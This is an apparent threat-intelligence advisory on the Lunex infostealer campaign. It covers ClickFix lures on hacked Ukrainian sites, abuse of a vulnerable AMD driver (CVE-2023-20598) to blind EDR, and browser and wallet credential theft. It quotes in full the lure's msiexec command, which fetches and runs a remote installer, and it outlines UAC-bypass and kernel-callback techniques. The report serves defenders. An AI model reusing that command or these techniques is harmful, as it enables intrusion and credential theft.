# Lunex Stealer Abuses Vulnerable AMD Radeon Driver (CVE-2023-20598) to Blind Security Monitoring and Steal Browser/Crypto Credentials

> Lunex, a malware-as-a-service platform, delivers the Psychedelic Stealer payload via LunexLoader in a four-stage ClickFix chain that exploits CVE-2023-20598 in the AMD Radeon PDFWKRNL.sys kernel driver to zero EDR/AV kernel callbacks without killing the processes, evading both HVCI and Microsoft's Vulnerable Driver Blocklist. It targets Ukrainian-speaking users via compromised legitimate websites, stealing credentials from seven Chromium browsers and nine cryptocurrency wallets and installing a PowerShell-backed browser Native Messaging Host for persistent remote filesystem access.

- **Published:** 2026-09-26T00:00:00Z
- **Last reviewed:** 2026-10-03T01:04:23Z
- **Canonical:** https://intel.threadlinqs.com/threat/TL-2026-2664
- **ID:** TL-2026-2664
- **Severity:** HIGH (CVSS 7.8)
- **Category:** MALWARE
- **Status:** ACTIVE
- **Detections:** 9 · **IOCs:** 26 (full data via the Threadlinqs MCP server — Purple tier)
- **CVEs:** CVE-2023-20598

## Description

Lunex is a Russian-speaking-developed malware-as-a-service (MaaS) infostealer platform whose current campaign, first reverse-engineered end-to-end by Ontinue's Cyber Defence Centre (researcher Rhys Downing, published 2026-09-25), chains four stages against Ukrainian-speaking internet users. The chain begins with a fake Cloudflare CAPTCHA verification page injected via iframe into compromised, legitimate small-business websites (a hair-treatment clinic, a scale-model manufacturer, a bookstore/publisher, a psychological-services facility, a tool retailer, and an automotive/tool retailer). The lure uses the 'ClickFix' technique: it copies a `msiexec.exe /i https://uasputnik.com/elita.msi /passive` command to the victim's clipboard and instructs them, in Ukrainian, to paste it into the Windows Run dialog (Win+R) to 'complete verification.' Arctic Wolf Labs, who first documented this specific ClickFix wave as 'Psychedelic Stealer' (published 2026-09-24) before the AMD-driver/LunexLoader linkage was known, recorded 557 lure views, 426 CAPTCHA clicks, and 79 completed installs across 32 countries between September 9-14, 2026, with Ukraine accounting for 446 of the views.

The MSI (also seen as `miks.msi` and `sova.msi`) drops LunexLoader, which first escalates from a standard user context by abusing the CMSTPLUA COM object to bypass User Account Control (UAC), a well-known 'fileless' UAC-bypass technique that requires no additional binary drop. With elevated privileges, LunexLoader performs a Bring-Your-Own-Vulnerable-Driver (BYOVD) attack, loading PDFWKRNL.sys, an AMD Radeon Software kernel driver vulnerable to CVE-2023-20598 (CVSS 3.1: 7.8, CWE-269 Improper Privilege Management), which lets an authenticated caller issue an IOCTL request to obtain arbitrary physical-memory and I/O-port read/write. Rather than the common BYOVD pattern of terminating EDR/AV processes outright (which is loud and immediately alerts on the process crash), LunexLoader uses PDB-guided kernel callback zeroing: it locates and nulls the registered kernel-mode notify-routine callbacks (process/thread/image-load callbacks) that security products rely on for telemetry, leaving the security product's process running and appearing healthy while it receives no further telemetry. Ontinue's testing found that neither Hypervisor-Protected Code Integrity (HVCI) nor the current Microsoft Vulnerable Driver Blocklist stops this specific PDFWKRNL.sys variant from loading, despite its hash having been catalogued in the LOLDrivers project since March 2026, when ESET's 'EDR Killers' research (published 2026-03-19, tracking ~90 EDR-killer tools in the wild) first flagged the driver as actively abused for defense evasion.

With monitoring blinded, LunexLoader downloads and executes the Psychedelic Stealer payload (`psychedeliclove.exe`, a 64-bit Windows executable) from the same or a related staging host. The stealer harvests saved credentials, cookies, and autofill data from seven Chromium-based browsers (Chrome, Edge, Brave, Opera, Opera GX, Vivaldi, Yandex) and targets nine cryptocurrency wallets: five desktop wallets (Bitcoin Core, Litecoin Core, Exodus, Atomic Wallet, Electrum) and four browser-extension wallets (MetaMask, Trust Wallet, OKX Wallet, SafePal), identified and extracted by known extension IDs. For durable access beyond simple credential theft, it establishes three independent persistence/access mechanisms: a Registry Run key, a hidden scheduled task named `psychedelicloveUtils` that fires at logon, and a malicious Chrome Native Messaging Host registered as `com.lunex.explorer` (manifest `com.lunex.explorer.json`, bridged via `host.ps1`/`host.bat`). The Native Messaging Host implements a roughly 13,200-byte embedded PowerShell script that gives the operator a full remote-filesystem backdoor from inside the browser process: drive listing, directory enumeration, arbitrary file read in 512 KB chunks up to 524 MB, file write, file download, and arbitrary code execution — all without dropping an additional standalone C2 implant.

Stolen data and remote-control traffic are sent to Lunex's operator infrastructure over HTTP(S) via REST-style endpoints (`/api/v1/ext/passwords`, `/api/v1/ext/tokens`, `/api/v1/ext/wallets`, `/api/v1/checkin`, `/api/v1/agent/config`, `/api/v1/agent/tasks`). BlueTeamCoolTeam's OSINT into the operator side of Lunex (published 2026-06-13, updated 2026-06-14) found the panel platform deployed as early as May 14, 2026, growing to six confirmed operator panels across five countries by June 5, 2026, each running an identical React front-end (consistent build hashes and a shared favicon MD5 `b9251db3aa9511157cba432c0b5402fc` on nginx/1.27.5) on operator port 8000/TCP alongside a stealer-facing API on 8080/TCP. Panel capabilities extend beyond passive collection to active browser hijacking: forced navigation (`open_url`), fake browser notifications (`notify`), arbitrary JavaScript injection into victim tabs (`inject`), visual page spoofing (`spoof`), on-demand screenshots, and full live interactive remote-browser control sessions. One panel was fronted by Cloudflare behind a domain (`api-goo-drivehosting.com`) deliberately crafted to resemble routine Google Drive/API traffic in security logs. By the time of Ontinue's September 2026 analysis, Lunex's infrastructure had expanded to 28 unique panels across 13 countries (including Russia, the US, the UK, Netherlands, France, Germany, Turkey, and Bangladesh), with a Turkey-hosted panel additionally serving a set of unrelated consumer-phishing domains (impersonating Sam's Club, WhatsApp Business, Namshi, and others), indicating the same infrastructure is reused/resold for non-Lunex phishing as part of the MaaS offering. No formal threat-actor or group name has been attached to Lunex; attribution rests on panel-build and language artifacts pointing to a Russian-speaking developer or development team.

## MITRE ATT&CK

- T1583.001 Domains
- T1584.004 Server
- T1204.004 Malicious Copy and Paste
- T1218.007 Msiexec
- T1548.002 Bypass User Account Control
- T1685 Disable or Modify Tools
- T1547.001 Registry Run Keys / Startup Folder
- T1053.005 Scheduled Task
- T1555.003 Credentials from Web Browsers
- T1539 Steal Web Session Cookie
- T1005 Data from Local System
- T1071.001 Web Protocols
- T1571 Non-Standard Port

## Sources

- [Lunex Stealer Abuses AMD Driver to Disable Security Monitoring and Steal Browser Credentials](https://thehackernews.com/2026/09/lunex-stealer-abuses-amd-driver-to.html)
- [Hacked Ukrainian Sites Serve Fake Cloudflare ClickFix Lures for Psychedelic Stealer](https://thehackernews.com/2026/09/hacked-ukrainian-sites-serve-fake.html)
- [The Psychedelic Stealer: When a CAPTCHA Becomes an Installer](https://arcticwolf.com/resources/blog/psychedelic-stealer-fake-clickfix-captcha-targets-ukraine/)
- [The Panel Behind the Prompt: OSINT into a Live Lunex Stealer Network](https://blueteam.cool/posts/lunex-c2-osint/)
- [AMD Radeon Graphics Kernel Driver Privilege Management Vulnerability (AMD-SB-6009)](https://www.amd.com/en/corporate/product-security/bulletin/AMD-SB-6009)
- [NVD - CVE-2023-20598](https://nvd.nist.gov/vuln/detail/cve-2023-20598)
- [LOLDrivers: PDFWKRNL.sys driver entry](https://www.loldrivers.io/drivers/ed27c0b8-6177-4132-a7af-5c15bcb386f3/)
- [ESET Research: A deep dive into EDR killers - a cornerstone of modern ransomware operations](https://www.eset.com/us/about/newsroom/research/eset-research-deep-dive-edr-killers-ransomware/)
- [ClickFix Campaign Abuses Trusted Websites to Deploy Psychedelic Stealer](https://securityaffairs.com/199731/malware/clickfix-campaign-abuses-trusted-websites-to-deploy-psychedelic-stealer.html)
- [Lunex Stealer Abuses AMD Driver to Disable Security Monitoring and Steal Browser Credentials (technical mirror)](https://blog.netmanageit.com/lunex-stealer-abuses-amd-driver-to-disable-security-monitoring-and-steal-browser-credentials/)

## Full data

Detection queries (Splunk SPL / Microsoft KQL / Sigma) and IOC values require the Threadlinqs MCP server (Purple tier): https://intel.threadlinqs.com/mcp

Canonical: https://intel.threadlinqs.com/threat/TL-2026-2664
